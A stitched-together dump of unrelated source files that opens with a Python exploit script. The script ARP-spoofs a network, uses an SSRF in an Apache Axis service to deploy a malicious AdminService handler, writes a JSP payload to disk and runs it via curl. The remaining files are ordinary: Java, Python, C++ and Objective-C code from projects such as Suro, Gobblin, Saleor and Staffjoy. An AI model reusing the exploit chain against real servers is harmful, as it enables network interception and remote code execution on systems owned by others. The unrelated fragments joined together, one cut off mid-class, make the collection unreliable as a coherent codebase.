payloadfile = open(sys.argv[1],'r').read() #Some file containing a JSP payload
#craft URL to deploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
deployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Adeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22+provider%3D%22java%3ARPC%22%3E%3CrequestFlow%3E%3Chandler+type%3D%22RandomLog%22%2F%3E%3C%2FrequestFlow%3E%3Cns1%3Aparameter+name%3D%22className%22+value%3D%22java.util.Random%22%2F%3E%3Cns1%3Aparameter+name%3D%22allowedMethods%22+value%3D%22%2A%22%2F%3E%3C%2Fns1%3Aservice%3E%3Chandler+name%3D%22RandomLog%22+type%3D%22java%3Aorg.apache.axis.handlers.LogHandler%22+%3E%3Cparameter+name%3D%22LogHandler.fileName%22+value%3D%22'+quote_plus(jspwritepath)+'%22+%2F%3E%3Cparameter+name%3D%22LogHandler.writeToConsole%22+value%3D%22false%22+%2F%3E%3C%2Fhandler%3E%3C%2Fns1%3Adeployment'
#craft URL to undeploy a service as described here https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce
undeployurl = 'http://localhost:'+targetport+'/axis/services/AdminService?method=%21--%3E%3Cns1%3Aundeployment+xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22+xmlns%3Ans1%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%3E%3Cns1%3Aservice+name%3D%22exploitservice%22%2F%3E%3C%2Fns1%3Aundeployment'
def CreateJsp(pathtoaxis,jsppayload):
url = pathtoaxis+"/services/exploitservice"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "something", "Content-Type": "text/xml;charset=UTF-8"}
data="<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:api=\"http://127.0.0.1/Integrics/Enswitch/API\"\r\n xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\r\n xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Body>\r\n <api:main\r\n soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <api:in0><![CDATA[\r\n"+jsppayload+"\r\n]]>\r\n </api:in0>\r\n </api:main>\r\n </soapenv:Body>\r\n</soapenv:Envelope>"
requests.post(url, headers=headers, data=data)
def TriggerSSRF(pathtoaxis):
url = pathtoaxis+"/StockQuoteService.jws"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "SOAPAction": "", "Content-Type": "text/xml;charset=UTF-8"}
data="<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:def=\"http://DefaultNamespace\">\r\n <soapenv:Header/>\r\n <soapenv:Body>\r\n <def:getQuote soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <symbol xsi:type=\"xsd:string\">dwas</symbol>\r\n </def:getQuote>\r\n </soapenv:Body>\r\n</soapenv:Envelope>"
requests.post(url, headers=headers, data=data)
def StartMitm(interface,target,gateway):
subprocess.Popen("echo 1 > /proc/sys/net/ipv4/ip_forward",shell=True)#Enable forwarding
subprocess.Popen("arpspoof -i {} -t {} {}".format(interface,target,gateway),shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)#spoof target -> gateway
subprocess.Popen("iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True)#use iptable to redirect back to our web server
def KillMitm(target,myip):
subprocess.Popen("pkill arpspoof",shell=True)
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward",shell=True)
subprocess.Popen("iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to {}".format(myip),shell=True)
def SSRFRedirect(new_path):
class myHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', new_path)
self.end_headers()
PORT = 80
SocketServer.TCPServer.allow_reuse_address = True
handler = SocketServer.TCPServer(("", PORT), myHandler)
print "[+] Waiting to redirect"
handler.handle_request()
print "[+] Payload URL sent"
def ExecuteJsp(pathtoaxis):
subprocess.Popen("curl "+pathtoaxis+"/exploit.jsp",shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print "[+] Starting MITM"
StartMitm(spoofinterface,target,gateway)
sleep(2)
print "[+] Starting web server for SSRF"
thread.start_new_thread(SSRFRedirect,(deployurl,))
print "[+] Using StockQuoteService.jws to trigger SSRF"
TriggerSSRF(pathtoaxis)
print "[+] Waiting 3 seconds for incoming request"
sleep(3)
print "[+] Writing JSP payload"
CreateJsp(pathtoaxis,payloadfile)
print "[+] Cleaning up exploit service"
thread.start_new_thread(SSRFRedirect,(undeployurl,))
TriggerSSRF(pathtoaxis)
print "[+] Cleaning up man in the middle"
KillMitm(target,myip)
print "[+] Waiting 2 seconds for JSP write"
sleep(2)
ExecuteJsp(pathtoaxis)
print "[+] Default URL to the jsp payload:"
print pathtoaxis+"/exploit.jsp"
| 3,223 |
537 | <filename>suro-s3/src/main/java/com/netflix/suro/input/remotefile/S3Consumer.java
package com.netflix.suro.input.remotefile;
import com.amazonaws.auth.AWSCredentialsProvider;
import com.amazonaws.auth.AWSSessionCredentials;
import com.fasterxml.jackson.annotation.JacksonInject;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Preconditions;
import com.google.common.util.concurrent.ThreadFactoryBuilder;
import com.netflix.servo.monitor.DynamicCounter;
import com.netflix.servo.monitor.MonitorConfig;
import com.netflix.suro.input.RecordParser;
import com.netflix.suro.input.SuroInput;
import com.netflix.suro.message.MessageContainer;
import com.netflix.suro.routing.MessageRouter;
import com.netflix.suro.sink.notice.Notice;
import com.netflix.suro.sink.remotefile.AWSSessionCredentialsAdapter;
import com.netflix.util.Pair;
import org.apache.commons.io.FileUtils;
import org.jets3t.service.Jets3tProperties;
import org.jets3t.service.impl.rest.httpclient.RestS3Service;
import org.jets3t.service.model.S3Object;
import org.jets3t.service.security.AWSCredentials;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.concurrent.*;
import java.util.concurrent.atomic.AtomicLong;
import java.util.zip.GZIPInputStream;
public class S3Consumer implements SuroInput {
public static final String TYPE = "s3";
private static Logger log = LoggerFactory.getLogger(S3Consumer.class);
private final String id;
private final String s3Endpoint;
private final long timeout;
private final int concurrentDownload;
private final Notice<String> notice;
private final RecordParser recordParser;
private final String downloadPath;
private AWSCredentialsProvider credentialsProvider;
private RestS3Service s3Service;
private volatile boolean running = false;
private ExecutorService executor;
private Future<?> runner = null;
private final MessageRouter router;
private final ObjectMapper jsonMapper;
@JsonCreator
public S3Consumer(
@JsonProperty("id") String id,
@JsonProperty("s3Endpoint") String s3Endpoint,
@JsonProperty("notice") Notice notice,
@JsonProperty("recvTimeout") long timeout,
@JsonProperty("concurrentDownload") int concurrentDownload,
@JsonProperty("downloadPath") String downloadPath,
@JsonProperty("recordParser") RecordParser recordParser,
@JacksonInject AWSCredentialsProvider credentialProvider,
@JacksonInject MessageRouter router,
@JacksonInject ObjectMapper jsonMapper,
@JacksonInject RestS3Service s3Service
) {
this.id = id;
this.s3Endpoint = s3Endpoint == null ? "s3.amazonaws.com" : s3Endpoint;
this.notice = notice;
this.timeout = timeout == 0 ? 1000 : timeout;
this.concurrentDownload = concurrentDownload == 0 ? 5 : concurrentDownload;
this.recordParser = recordParser;
this.downloadPath = downloadPath == null ? "/logs/suro-s3consumer/" + id : downloadPath;
this.credentialsProvider = credentialProvider;
this.router = router;
this.jsonMapper = jsonMapper;
this.s3Service = s3Service;
Preconditions.checkNotNull(notice, "notice is needed");
Preconditions.checkNotNull(recordParser, "recordParser is needed");
}
@Override
public String getId() {
return id;
}
private static final long MAX_PAUSE = 10000;
@Override
public void start() throws Exception {
if (s3Service == null) {
Jets3tProperties properties = new Jets3tProperties();
properties.setProperty("s3service.s3-endpoint", s3Endpoint);
if (credentialsProvider.getCredentials() instanceof AWSSessionCredentials) {
s3Service = new RestS3Service(
new AWSSessionCredentialsAdapter(credentialsProvider),
null, null, properties);
} else {
s3Service = new RestS3Service(
new AWSCredentials(
credentialsProvider.getCredentials().getAWSAccessKeyId(),
credentialsProvider.getCredentials().getAWSSecretKey()),
null, null, properties);
}
}
executor = new ThreadPoolExecutor(
concurrentDownload + 1,
concurrentDownload + 1,
0, TimeUnit.MILLISECONDS,
new ArrayBlockingQueue<Runnable>(concurrentDownload) {
@Override
public boolean offer(Runnable runnable) {
try {
put(runnable); // not to reject the task, slowing down
} catch (InterruptedException e) {
// do nothing
}
return true;
}
},
new ThreadFactoryBuilder().setDaemon(true).setNameFormat("S3Consumer-" + id + "-%d").build());
notice.init();
running = true;
runner = executor.submit(new Runnable() {
@Override
public void run() {
while (running) {
try {
long pause = Math.min(pausedTime.get(), MAX_PAUSE);
if (pause > 0) {
Thread.sleep(pause);
pausedTime.set(0);
}
Pair<String, String> msg = notice.peek();
if (msg != null) {
executor.submit(createDownloadRunnable(msg));
} else {
Thread.sleep(timeout);
}
} catch (Exception e) {
log.error("Exception on receiving messages from Notice", e);
}
}
}
});
}
@Override
public void shutdown() {
try {
log.info("shutting down S3Consumer now");
running = false;
try {
runner.get();
} catch (InterruptedException e) {
// do nothing
} catch (ExecutionException e) {
log.error("Exception on stopping the task", e);
}
executor.shutdown();
while (true) {
if (!executor.awaitTermination(timeout * 5, TimeUnit.MILLISECONDS)) {
log.warn("downloading jobs were not terminated gracefully, retry again...");
} else {
break;
}
}
s3Service.shutdown();
} catch (Exception e) {
log.error("Exception on shutting down s3Service: " + e.getMessage(), e);
}
}
private AtomicLong pausedTime = new AtomicLong(0);
@Override
public void setPause(long ms) {
pausedTime.addAndGet(ms);
}
public static TypeReference<Map<String, Object>> typeReference = new TypeReference<Map<String, Object>>() {};
private static final int retryCount = 5;
private static final int sleepOnS3Exception = 5000;
private Runnable createDownloadRunnable(final Pair<String, String> msg) {
Map<String, Object> msgMap = null;
try {
msgMap = parseMessage(msg);
} catch (Exception e) {
log.error("Invalid message: " + e.getMessage(), e);
return createEmptyRunnable(msg);
}
String s3Bucket = null;
List<String> s3ObjectKey = null;
try {
s3Bucket = (String) msgMap.get("s3Bucket");
s3ObjectKey = (List<String>) msgMap.get("s3ObjectKey");
if (s3Bucket == null || s3ObjectKey == null) {
throw new NullPointerException("s3Bucket or s3ObjectKey is null");
}
} catch (Exception e) {
log.error("Invalid message: " + e.getMessage(), e);
return createEmptyRunnable(msg);
}
final String s3BucketClone = s3Bucket;
final List<String> s3ObjectKeyClone = s3ObjectKey;
return new Runnable() {
@Override
public void run() {
List<String> downloadedFiles = new ArrayList<String>();
for (String path : s3ObjectKeyClone) {
boolean success = false;
String localFileName = path.replace("/", "");
for (int i = 0; i < retryCount; ++i) {
try {
S3Object object = s3Service.getObject(s3BucketClone, path);
FileUtils.copyInputStreamToFile(object.getDataInputStream(),
new File(downloadPath, localFileName));
success = true;
log.info(path + " downloaded successfully");
break;
} catch (Exception e) {
log.error("Exception on downloading and processing file: " + e.getMessage(), e);
DynamicCounter.increment(
MonitorConfig.builder("s3Exception").withTag("consumerId", id).build());
try {
Thread.sleep(sleepOnS3Exception);
} catch (InterruptedException e1) {
// do nothing
}
}
}
if (success) {
downloadedFiles.add(localFileName);
}
}
if (s3ObjectKeyClone.size() == downloadedFiles.size()) {
for (String path : downloadedFiles) {
try {
BufferedReader br = new BufferedReader(
new InputStreamReader(
createInputStream(path)));
String data = null;
while ((data = br.readLine()) != null) {
try {
if (data.trim().length() > 0) {
for (MessageContainer msg : recordParser.parse(data)) {
router.process(S3Consumer.this, msg);
}
}
} catch (Exception e) {
log.error("Exception on parsing and processing: " + e.getMessage(), e);
}
}
br.close();
deleteFile(path);
} catch (Exception e) {
log.error("Exception on processing downloaded file: " + e.getMessage(), e);
DynamicCounter.increment(
MonitorConfig.builder("processingException").withTag("consumerId", id).build()
);
}
}
notice.remove(msg.first());
}
}
};
}
private void deleteFile(String path) {
File f = new File(downloadPath, path);
while (f.exists()) {
f.delete();
}
}
@VisibleForTesting
protected Map<String, Object> parseMessage(Pair<String, String> msg) throws IOException {
Map<String, Object> msgContainer = jsonMapper.readValue(msg.second(), typeReference);
if (!(msgContainer.get("Message") instanceof Map)) {
return jsonMapper.readValue(msgContainer.get("Message").toString(), typeReference);
} else {
return (Map<String, Object>) msgContainer.get("Message");
}
}
private InputStream createInputStream(String path) throws IOException {
if (path.endsWith(".gz")) {
return new GZIPInputStream(
new FileInputStream(new File(downloadPath, path)));
} else {
return new FileInputStream(new File(downloadPath, path));
}
}
private Runnable createEmptyRunnable(final Pair<String, String> msg) {
return new Runnable() {
@Override
public void run() {
log.error("invalid msg: " + msg.second());
}
};
}
@Override
public boolean equals(Object o) {
if (o instanceof S3Consumer) {
S3Consumer kafkaConsumer = (S3Consumer) o;
return kafkaConsumer.id.equals(id);
} else {
return false;
}
}
@Override
public int hashCode() {
return (getId()).hashCode();
}
}
| 6,614 |
1,110 | from cms.test_utils.project.pluginapp.plugins.manytomany_rel.models import Article, Section
from django.contrib import admin
from django.contrib.admin import ModelAdmin
admin.site.register(Section, ModelAdmin)
admin.site.register(Article, ModelAdmin)
| 75 |
377 | /**
* Copyright 2012 Impetus Infotech.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.impetus.client.neo4j.imdb;
import javax.persistence.metamodel.Metamodel;
import junit.framework.Assert;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import com.impetus.kundera.metadata.KunderaMetadataManager;
import com.impetus.kundera.metadata.model.EntityMetadata;
/**
* Test case for validating correctness of Metamodel for Map data type
*
* @author amresh.singh
*/
public class IMDBMapMetamodelTest extends IMDBTestBase
{
/**
* @throws java.lang.Exception
*/
@Before
public void setUp() throws Exception
{
init();
}
/**
* @throws java.lang.Exception
*/
@After
public void tearDown() throws Exception
{
clean();
}
@Test
public void testMetamodel()
{
EntityMetadata m1 = KunderaMetadataManager.getEntityMetadata(kunderaMetadata, Actor.class);
Assert.assertNotNull(m1);
Assert.assertEquals(Actor.class, m1.getEntityClazz());
Assert.assertEquals(Role.class, m1.getRelation("movies").getMapKeyJoinClass());
Assert.assertEquals(Movie.class, m1.getRelation("movies").getTargetEntity());
Assert.assertEquals("ACTS_IN", m1.getRelation("movies").getJoinColumnName(kunderaMetadata));
EntityMetadata m2 = KunderaMetadataManager.getEntityMetadata(kunderaMetadata, Movie.class);
Assert.assertNotNull(m2);
Assert.assertEquals(Movie.class, m2.getEntityClazz());
Assert.assertEquals(Role.class, m2.getRelation("actors").getMapKeyJoinClass());
Assert.assertEquals(Actor.class, m2.getRelation("actors").getTargetEntity());
Assert.assertNotNull(m2.getRelation("actors").getJoinColumnName(kunderaMetadata));
Assert.assertEquals(m2.getRelation("actors").getJoinColumnName(kunderaMetadata),"actors");
EntityMetadata m3 = KunderaMetadataManager.getEntityMetadata(kunderaMetadata, Role.class);
Assert.assertNotNull(m3);
Assert.assertEquals(Role.class, m3.getEntityClazz());
Metamodel mm = KunderaMetadataManager.getMetamodel(kunderaMetadata, "imdb");
Assert.assertNotNull(mm);
}
}
| 1,032 |
918 | <filename>gobblin-modules/gobblin-parquet-common/src/main/java/org/apache/gobblin/parquet/writer/ParquetWriterConfiguration.java
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.gobblin.parquet.writer;
import org.apache.hadoop.fs.Path;
import com.typesafe.config.Config;
import lombok.Getter;
import lombok.ToString;
import org.apache.gobblin.configuration.State;
import org.apache.gobblin.util.ConfigUtils;
import org.apache.gobblin.util.ForkOperatorUtils;
import static org.apache.gobblin.configuration.ConfigurationKeys.LOCAL_FS_URI;
import static org.apache.gobblin.configuration.ConfigurationKeys.WRITER_CODEC_TYPE;
import static org.apache.gobblin.configuration.ConfigurationKeys.WRITER_FILE_SYSTEM_URI;
import static org.apache.gobblin.configuration.ConfigurationKeys.WRITER_PREFIX;
/**
* Holds configuration for the {@link ParquetHdfsDataWriter}
*/
@Getter @ToString
public class ParquetWriterConfiguration {
public static final String WRITER_PARQUET_PAGE_SIZE = WRITER_PREFIX + ".parquet.pageSize";
public static final String WRITER_PARQUET_DICTIONARY_PAGE_SIZE = WRITER_PREFIX + ".parquet.dictionaryPageSize";
public static final String WRITER_PARQUET_DICTIONARY = WRITER_PREFIX + ".parquet.dictionary";
public static final String WRITER_PARQUET_VALIDATE = WRITER_PREFIX + ".parquet.validate";
public static final String WRITER_PARQUET_VERSION = WRITER_PREFIX + ".parquet.version";
public static final String DEFAULT_PARQUET_WRITER = "v1";
public static final String WRITER_PARQUET_FORMAT = WRITER_PREFIX + ".parquet.format";
public static final String DEFAULT_PARQUET_FORMAT = "group";
public static final int DEFAULT_BLOCK_SIZE = 128 * 1024 * 1024;
public static final int DEFAULT_PAGE_SIZE = 1 * 1024 * 1024;
public static final String DEFAULT_COMPRESSION_CODEC_NAME = "UNCOMPRESSED";
public static final String[] ALLOWED_COMPRESSION_CODECS = {"SNAPPY", "LZO", "UNCOMPRESSED", "GZIP"};
public static final boolean DEFAULT_IS_DICTIONARY_ENABLED = true;
public static final boolean DEFAULT_IS_VALIDATING_ENABLED = false;
public static final String DEFAULT_WRITER_VERSION = "v1";
public static final String[] ALLOWED_WRITER_VERSIONS = {"v1", "v2"};
private final int pageSize;
private final int dictPageSize;
private final boolean dictionaryEnabled;
private final boolean validate;
private final String writerVersion;
private final ParquetRecordFormat recordFormat;
private final int numBranches;
private final int branchId;
private final String codecName;
private final Path absoluteStagingFile;
private final int blockSize;
public ParquetWriterConfiguration(State state, int numBranches, int branchId, Path stagingFile, int blockSize) {
this(ConfigUtils.propertiesToConfig(state.getProperties()), numBranches, branchId, stagingFile, blockSize);
}
private String getProperty(String key) {
return ForkOperatorUtils.getPropertyNameForBranch(key, numBranches, branchId);
}
public static ParquetRecordFormat getRecordFormatFromConfig(Config config) {
String writeSupport = ConfigUtils.getString(config, WRITER_PARQUET_FORMAT, DEFAULT_PARQUET_FORMAT);
ParquetRecordFormat recordFormat = ParquetRecordFormat.valueOf(writeSupport.toUpperCase());
return recordFormat;
}
ParquetWriterConfiguration(Config config, int numBranches, int branchId, Path stagingFile, int blockSize) {
this.numBranches = numBranches;
this.branchId = branchId;
this.pageSize = ConfigUtils.getInt(config, getProperty(WRITER_PARQUET_PAGE_SIZE), DEFAULT_PAGE_SIZE);
this.dictPageSize = ConfigUtils.getInt(config, getProperty(WRITER_PARQUET_DICTIONARY_PAGE_SIZE), DEFAULT_BLOCK_SIZE);
this.dictionaryEnabled =
ConfigUtils.getBoolean(config, getProperty(WRITER_PARQUET_DICTIONARY), DEFAULT_IS_DICTIONARY_ENABLED);
this.validate = ConfigUtils.getBoolean(config, getProperty(WRITER_PARQUET_VALIDATE), DEFAULT_IS_VALIDATING_ENABLED);
String rootURI = ConfigUtils.getString(config, WRITER_FILE_SYSTEM_URI, LOCAL_FS_URI);
this.absoluteStagingFile = new Path(rootURI, stagingFile);
this.codecName = ConfigUtils.getString(config,getProperty(WRITER_CODEC_TYPE), DEFAULT_COMPRESSION_CODEC_NAME);
this.recordFormat = getRecordFormatFromConfig(config);
this.writerVersion = ConfigUtils.getString(config, getProperty(WRITER_PARQUET_VERSION), DEFAULT_WRITER_VERSION);
this.blockSize = blockSize;
}
}
| 1,653 |
1,171 | #ifdef __OBJC__
#import <UIKit/UIKit.h>
#else
#ifndef FOUNDATION_EXPORT
#if defined(__cplusplus)
#define FOUNDATION_EXPORT extern "C"
#else
#define FOUNDATION_EXPORT extern
#endif
#endif
#endif
FOUNDATION_EXPORT double Pods_Sizes_ExampleVersionNumber;
FOUNDATION_EXPORT const unsigned char Pods_Sizes_ExampleVersionString[];
| 121 |
890 | <reponame>Joey-Wondersign/Staffjoy-suite-Joey<filename>tests/unit/models/test_user.py
from tests.unit.test_base import BasicsTestCase
from flask import g
from app import db
from app.models import Location, Role, User
class AppTestUser(BasicsTestCase):
def test_is_sudo(self):
# admin is not
g.current_user = self.admin
assert not g.current_user.is_sudo()
# manager is not
g.current_user = self.manager
assert not g.current_user.is_sudo()
# user1 is not
g.current_user = self.user1
assert not g.current_user.is_sudo()
# make a sudo user
sudo_dude = User(
email="<EMAIL>", name="<NAME>", sudo=True)
db.session.add(sudo_dude)
db.session.commit()
g.current_user = sudo_dude
assert g.current_user.is_sudo()
def test_is_org_admin_or_location_manager(self):
# create a 2nd location
location2 = Location(
name="2nd Location",
organization_id=self.organization.id,
timezone="UTC")
db.session.add(location2)
db.session.commit()
# org admins can access all
g.current_user = self.admin
assert g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=self.location.id)
assert g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=location2.id)
# role to users are not either
g.current_user = self.user2
assert not g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=self.location.id)
assert not g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=location2.id)
# location managers have selective access
g.current_user = self.manager
assert g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=self.location.id)
assert not g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=location2.id)
# make user2 a manager of the new location
location2.managers.append(self.user2)
db.session.commit()
g.current_user = self.user2
assert not g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=self.location.id)
assert g.current_user.is_org_admin_or_location_manager(
org_id=self.organization.id, location_id=location2.id)
def test_is_org_admin(self):
# org admins have access
g.current_user = self.admin
assert g.current_user.is_org_admin(org_id=self.organization.id)
# role to users do not
g.current_user = self.user2
assert not g.current_user.is_org_admin(org_id=self.organization.id)
# location managers do not
g.current_user = self.manager
assert not g.current_user.is_org_admin(org_id=self.organization.id)
def test_is_manager_in_org(self):
# org admins are not managers
g.current_user = self.admin
assert not g.current_user.is_manager_in_org(
org_id=self.organization.id)
# role to users do not
g.current_user = self.user2
assert not g.current_user.is_manager_in_org(
org_id=self.organization.id)
# location managers do
g.current_user = self.manager
assert g.current_user.is_manager_in_org(org_id=self.organization.id)
# create a 2nd location
location2 = Location(
name="2nd Location",
organization_id=self.organization.id,
timezone="UTC")
db.session.add(location2)
db.session.commit()
# make user2 a manager of the new location
location2.managers.append(self.user2)
db.session.commit()
g.current_user = self.user2
assert g.current_user.is_manager_in_org(org_id=self.organization.id)
def test_is_location_manager(self):
# create a 2nd location
location2 = Location(
name="2nd Location",
organization_id=self.organization.id,
timezone="UTC")
db.session.add(location2)
db.session.commit()
# org admins are not managers
g.current_user = self.admin
assert not g.current_user.is_location_manager(
location_id=self.location.id)
assert not g.current_user.is_location_manager(location_id=location2.id)
# role to users are not either
g.current_user = self.user2
assert not g.current_user.is_location_manager(
location_id=self.location.id)
assert not g.current_user.is_location_manager(location_id=location2.id)
# location managers have selective access
g.current_user = self.manager
assert g.current_user.is_location_manager(location_id=self.location.id)
assert not g.current_user.is_location_manager(location_id=location2.id)
# make user2 a manager of the new location
location2.managers.append(self.user2)
db.session.commit()
g.current_user = self.user2
assert not g.current_user.is_location_manager(
location_id=self.location.id)
assert g.current_user.is_location_manager(location_id=location2.id)
def test_is_location_worker(self):
# create a 2nd location
location2 = Location(
name="2nd Location",
organization_id=self.organization.id,
timezone="UTC")
db.session.add(location2)
db.session.commit()
# create a 2nd role
role2 = Role(name="2nd Role", location_id=location2.id)
db.session.add(role2)
# admins are not considered workers in the location
g.current_user = self.admin
assert not g.current_user.is_location_worker(
location_id=self.location.id)
assert not g.current_user.is_location_worker(location_id=location2.id)
# location managers are also not considered workers
g.current_user = self.manager
assert not g.current_user.is_location_worker(
location_id=self.location.id)
assert not g.current_user.is_location_worker(location_id=location2.id)
g.current_user = self.user1
assert g.current_user.is_location_worker(location_id=self.location.id)
assert not g.current_user.is_location_worker(location_id=location2.id)
| 2,888 |
2,542 | <reponame>vishnuk007/service-fabric
//------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
//------------------------------------------------------------
#pragma once
namespace ServiceModel
{
namespace ModelV2
{
class CodePackageResources
: public Serialization::FabricSerializable
, public Common::IFabricJsonSerializable
{
public:
CodePackageResources() = default;
bool operator==(CodePackageResources const & other) const;
DEFAULT_MOVE_ASSIGNMENT(CodePackageResources)
DEFAULT_MOVE_CONSTRUCTOR(CodePackageResources)
DEFAULT_COPY_ASSIGNMENT(CodePackageResources)
DEFAULT_COPY_CONSTRUCTOR(CodePackageResources)
BEGIN_JSON_SERIALIZABLE_PROPERTIES()
SERIALIZABLE_PROPERTY(ServiceModel::Constants::memoryInGB, memoryInGB_)
SERIALIZABLE_PROPERTY(ServiceModel::Constants::cpu, cpu_)
END_JSON_SERIALIZABLE_PROPERTIES()
__declspec(property(get=get_MemoryInGB)) double MemoryInGB;
double get_MemoryInGB() const { return memoryInGB_; }
__declspec(property(get=get_Cpu)) double Cpu;
double get_Cpu() const { return cpu_; }
BEGIN_DYNAMIC_SIZE_ESTIMATION()
DYNAMIC_SIZE_ESTIMATION_MEMBER(memoryInGB_)
DYNAMIC_SIZE_ESTIMATION_MEMBER(cpu_)
END_DYNAMIC_SIZE_ESTIMATION()
FABRIC_FIELDS_02(
memoryInGB_,
cpu_);
private:
double memoryInGB_;
double cpu_;
};
class CodePackageResourceDescription
: public ModelType
{
public:
CodePackageResourceDescription() = default;
bool operator==(CodePackageResourceDescription const & other) const;
DEFAULT_MOVE_ASSIGNMENT(CodePackageResourceDescription)
DEFAULT_MOVE_CONSTRUCTOR(CodePackageResourceDescription)
DEFAULT_COPY_ASSIGNMENT(CodePackageResourceDescription)
DEFAULT_COPY_CONSTRUCTOR(CodePackageResourceDescription)
BEGIN_JSON_SERIALIZABLE_PROPERTIES()
SERIALIZABLE_PROPERTY(ServiceModel::Constants::resourcesRequests, resourceRequests_)
SERIALIZABLE_PROPERTY_IF(ServiceModel::Constants::resourcesLimits, resourceLimitsPtr_, resourceLimitsPtr_ != nullptr)
END_JSON_SERIALIZABLE_PROPERTIES()
Common::ErrorCode TryValidate(std::wstring const &traceId) const override;
BEGIN_DYNAMIC_SIZE_ESTIMATION()
DYNAMIC_SIZE_ESTIMATION_MEMBER(resourceRequests_)
DYNAMIC_SIZE_ESTIMATION_MEMBER(resourceLimitsPtr_)
END_DYNAMIC_SIZE_ESTIMATION()
FABRIC_FIELDS_02(resourceRequests_, resourceLimitsPtr_);
private:
CodePackageResources resourceRequests_;
std::shared_ptr<CodePackageResources> resourceLimitsPtr_;
};
}
}
| 1,374 |
15,337 | <reponame>fairhopeweb/saleor<gh_stars>1000+
import graphene
from ...product import ProductTypeKind
from ..core.enums import to_enum
ProductTypeKindEnum = to_enum(ProductTypeKind)
class ProductAttributeType(graphene.Enum):
PRODUCT = "PRODUCT"
VARIANT = "VARIANT"
class StockAvailability(graphene.Enum):
IN_STOCK = "AVAILABLE"
OUT_OF_STOCK = "OUT_OF_STOCK"
class CollectionPublished(graphene.Enum):
PUBLISHED = "published"
HIDDEN = "hidden"
class ProductTypeConfigurable(graphene.Enum):
CONFIGURABLE = "configurable"
SIMPLE = "simple"
class ProductTypeEnum(graphene.Enum):
DIGITAL = "digital"
SHIPPABLE = "shippable"
class VariantAttributeScope(graphene.Enum):
ALL = "all"
VARIANT_SELECTION = "variant_selection"
NOT_VARIANT_SELECTION = "not_variant_selection"
| 317 |
500 | from collections import Counter
import matplotlib
import numpy as np
from matplotlib import pyplot as plt
from .mapview import MapView
from sompy.visualization.plot_tools import plot_hex_map
class BmuHitsView(MapView):
